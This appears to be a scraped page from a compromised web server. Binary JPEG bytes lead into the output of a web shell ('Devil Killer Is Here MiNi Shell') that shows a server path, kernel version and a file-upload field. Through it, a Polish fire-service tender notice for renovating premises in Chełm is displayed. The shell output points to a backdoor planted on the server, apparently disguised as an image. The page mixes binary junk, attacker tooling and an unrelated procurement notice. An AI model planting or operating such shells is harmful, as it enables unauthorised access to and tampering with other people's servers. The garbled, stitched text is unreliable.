JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230309/0012889101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa remontu pomieszczeń w KM PSP w Chełmie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Chełmie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KM PSP w Chełmie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110200225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prymasa Stefana Wyszyńskiego 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">503985231</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">825655550</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">km_chelm@straz.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strazchelm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa remontu pomieszczeń w KM PSP w Chełmie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3142a6b1-be61-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00128891</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032740/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa remontu pomieszczeń KM PSP w Chełmie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3142a6b1-be61-11ed-8261-62cbbe4d0ca4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja miedzy Zamawiającym a<br/> Wykonawcami odbywa się przy użyciu Platformy Zamówień Publicznych ZETOPZP:<br/> https://przetargi.lubleskie.straz.gov.pl/-&gt;”JEDNOSTKI”-&gt;”KM PSP Chełm” oraz poczty<br/> elektronicznej pod adresem km_chelm@straz.lublin.pl, przy czym złożenie oferty wraz <br/> z załączonymi do oferty dokumentami może nastąpić wyłącznie za pośrednictwem<br/> Platformy Zamówień Publicznych ZETOPZP: https//przetargi.lubleskie.straz.gov.pl/-<br/> &gt;”JEDNOSTKI”-&gt;”KM PSP Chełm”</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">stały dostęp do sieci Inernet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>6.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięc min 2 GB Ram procesor<br/> Intel IV 2GHz, jeden z systemów operacyjnych – MS Windows 10, Mac Os x 10,4, Linux<br/> lub ich nowsze wersje;<br/>6.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/> obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>6.4. włączona obsługa JavaScript;<br/>6.5. zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>6.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez<br/> wystawcę certyfikatu używanego przez Wykonawcę.<br/>7. Zamawiający, zgodnie z § 11 ust.2 rozporządzenia Rady Ministrów z dnia 30 grudnia<br/> 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/> technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/> w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz.<br/> 2452) podaje następujące informacje na temat specyfikacji połączenia, formatu<br/> przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru<br/> danych:<br/>7.1. dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB <br/> w formatach: .doc, .pdf, .zip, .docx, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .xades, .sig,<br/>7.2. informacje na temat kodowania i czasu odbioru danych ; - plik załączony przez<br/> Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest <br/> w systemie jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/> dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/> składania ofert; <br/>8. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/> (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest<br/> zsynchronizowany ze znacznikiem czasu UTC. Wykonawca powinien dokładnie<br/> zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z jej wymaganiami.<br/>9. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści<br/> SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https//przetargi.lubleskie.straz.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.9.) Sposób dostępu do narzędzi elektronicznego modelowania danych budowlanych: <span class="normal">Zamawiający we własnym zakresie sporządza wymagany projekt wizualizacji oraz załącza w pliku ogólnie dostępnym np PDF</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia<br/> Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/> ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/> rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016 str.1 z późn. zm.)<br/> zwanego dalej „RODO”, w celu umożliwienia korzystania ze środków ochrony prawnej,<br/> o których mowa w dziale 9 ustawy PZP, do upływu terminu do ich wniesienia;<br/>2. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust 1-3 RODO,<br/> wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, <br/> której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/> żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/> publicznego;<br/>3. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania <br/> lub uzupełnienia danych osobowych o którym mowa w art. 16 RODO, nie może<br/> skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą<br/> postanowień umowy w zakresie niezgodnym z ustawą;<br/>4. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/> przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/> zamówienia publicznego;<br/>5. Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie<br/> zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/> rozpowszechnianiem;<br/>6. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, będą<br/> dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone<br/> do przetwarzania takich danych są obowiązane do zachowania ich w poufności;<br/>7. zasada jawności, o której mowa w art. 71 ust 1 ustawy PZP, ma zastosowanie <br/> do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust.1<br/> RODO, zebranych w toku postępowania o udzielenie zamówienia publicznego;<br/>8. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku, <br/> gdy wniesienie żądania o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie<br/> przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/> Zamawiający nie udostępnia tych danych zawartych w protokole i załącznikach <br/> do protokołu, chyba że zachodzą przesłanki o których mowa w art. 18 ust.2 RODO;<br/>9. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania <br/> lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać integralności<br/> protokołu oraz jego załączników.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia<br/> Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/> ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/> rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016 str.1 z późn. zm.)<br/> zwanego dalej „RODO”, w celu umożliwienia korzystania ze środków ochrony prawnej,<br/> o których mowa w dziale 9 ustawy PZP, do upływu terminu do ich wniesienia;<br/>2. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust 1-3 RODO,<br/> wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, <br/> której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/> żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/> publicznego;<br/>3. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania <br/> lub uzupełnienia danych osobowych o którym mowa w art. 16 RODO, nie może<br/> skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą<br/> postanowień umowy w zakresie niezgodnym z ustawą;<br/>4. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/> przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/> zamówienia publicznego;<br/>5. Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie<br/> zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/> rozpowszechnianiem;<br/>6. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, będą<br/> dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone<br/> do przetwarzania takich danych są obowiązane do zachowania ich w poufności;<br/>7. zasada jawności, o której mowa w art. 71 ust 1 ustawy PZP, ma zastosowanie <br/> do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust.1<br/> RODO, zebranych w toku postępowania o udzielenie zamówienia publicznego;<br/>8. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku, <br/> gdy wniesienie żądania o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie<br/> przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/> Zamawiający nie udostępnia tych danych zawartych w protokole i załącznikach <br/> do protokołu, chyba że zachodzą przesłanki o których mowa w art. 18 ust.2 RODO;<br/>9. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania <br/> lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać integralności<br/> protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ML.2370.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 380000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi remontowej polegającej w szczególności na rozebraniu istniejących okładzin ścian i sufitów, wymianie instalacji elektrycznej i alarmowo-sygnalizacyjnej, wykonania nowej instalacji elektrycznej w tym oświetleniowej, sygnalizacyjno-alarmowej, wymianie stolarki drzwiowej aluminiowej, wykonaniu prac wykończeniowych w tym: wykonanie sufitu podwieszanego z płyt G-K, ułożenie stopni schodów i podstopnic z granitu, gruntowanie, równanie ścian oraz malowanie. Wymiana mebli kuchennych z drewnianych na stalowe, wymiana AGD, wymiana szafek socjalnych strażaków. Całość prac, w tym aranżacja wnętrza, poprzedzona zostanie pełną wizualizacją zamierzenia wykonaną przez Wykonawcę i przedstawioną do akceptacji przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50760000-0 - Usługi napraw i konserwacji obiektów użyteczności społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku badania i oceny ofert Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert, dokona wezwania do uzupełnienia oświadczeń lub dokumentów, poprawi oczywiste omyłki pisarskie, rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty z SWZ, niepowodujące istotnych zmian w treści oferty. W przypadku dokonania przez Zamawiającego poprawek w ofercie na zasadach określonych wyżej, Zamawiający niezwłocznie zawiadamia o tym, Wykonawcę, którego oferta została poprawiona.<br/>Cena jednostkowa zawiera wszystkie koszty związane z realizacją zamówienia i będzie podana w PLN z dokładnością do dwóch miejsc po przecinku<br/>Do obliczenia ceny oferty należy obliczyć wartość brutto poszczególnych pozycji zamówienia poprzez przemnożenie ilości i ceny jednostkowej netto i brutto a następnie zsumować wszystkie pozycje i otrzymaną wartość podać jako cenę oferty w formularzu ofertowym. Tak obliczona cena oferty będzie podstawiona do wzoru podanego w kryterium oceny ofert. Podać zastosowaną stawkę VAT. Prawidłowe ustalenie podatku VAT należy do obowiązków wykonawcy, zgodnie z przepisami ustawy o podatku od towarów i usług oraz podatku akcyzowym. <br/>Zastosowanie przez wykonawcę stawki podatku VAT niezgodnej z obowiązującymi przepisami, zamawiający potraktuje jako błąd w obliczeniu ceny nie podlegającej korekcie, co spowoduje odrzucenie oferty. <br/><br/><br/>Rozdział 13<br/>Kryteria wyboru oferty i sposób oceny ofert <br/><br/>1.	Ocena ofert będzie dokonana w następujący sposób: <br/>1.1.Cena – waga (znaczenie procentowe kryterium): 60%<br/>1.2. Termin gwarancji jakości – waga (znaczenie procentowe kryterium): 40% <br/>1.3. Oferty zostaną ocenione w systemie punktowym, zgodnie z poniższymi zasadami: <br/>a) Cena oferty będzie oceniona według następującego wzoru: <br/> Cmin<br/>C = --------------- x 100 x 60% <br/> Cbo<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium cena <br/>Cmin. – najniższa cena spośród wszystkich ważnych i nie odrzuconych ofert<br/>Cbo – cena badanej oferty<br/><br/><br/>	<br/>b) Termin gwarancji jakości będzie oceniony według następującego wzoru: <br/> Tbo<br/>T = --------------- x 100 x 40% <br/> Tmax<br/>T – ilość punktów jakie otrzyma badana oferta za kryterium termin gwarancji jakości<br/>Tbo – okres gwarancji jakości (w miesiącach) badanej oferty wynoszący maksymalnie 60 miesięcy, <br/>Tmax – najdłuższy wśród badanych ofert, okres gwarancji jakości (w miesiącach) wynoszący maksymalnie 60 miesięcy. <br/>Wymagany minimalny okres gwarancji jakości wynosi 36 miesięcy (w przypadku gdy wykonawca nie określi terminu gwarancji jakości, zamawiający przyjmie że ten okres będzie równy minimalnemu wymaganemu okresowi gwarancji t.j. 36 miesięcy.<br/>Wymagany maksymalny okres gwarancji jakości wynosi 60 miesięcy (w przypadku gdy wykonawca określi dłuższy termin gwarancji jakości, zamawiający przyjmie że ten okres będzie równy maksymalnemu wymaganemu okresowi gwarancji t.j. 60 miesięcy.<br/>2.	Najkorzystniejsza oferta, to oferta niepodlegająca odrzuceniu, która uzyskała najwyższą liczbę sumy punktów w kryteriach oceny ofert zgodnie z przedstawionym wzorem:<br/>S= KC+KT gdzie:<br/><br/>S- suma ilości punktów<br/>Kc- ilość punktów ustalona na podstawie kryterium ceny<br/>KT – ilość punktów ustalona na podstawie kryterium termin gwarancji jakości<br/><br/>3.	Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.<br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych; wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu na podstawie art. 57 ust. 2 ustawy p.z.p. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w stosunku do żadnego z Wykonawców nie może być podstaw do wykluczenia. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 100.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych),<br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, 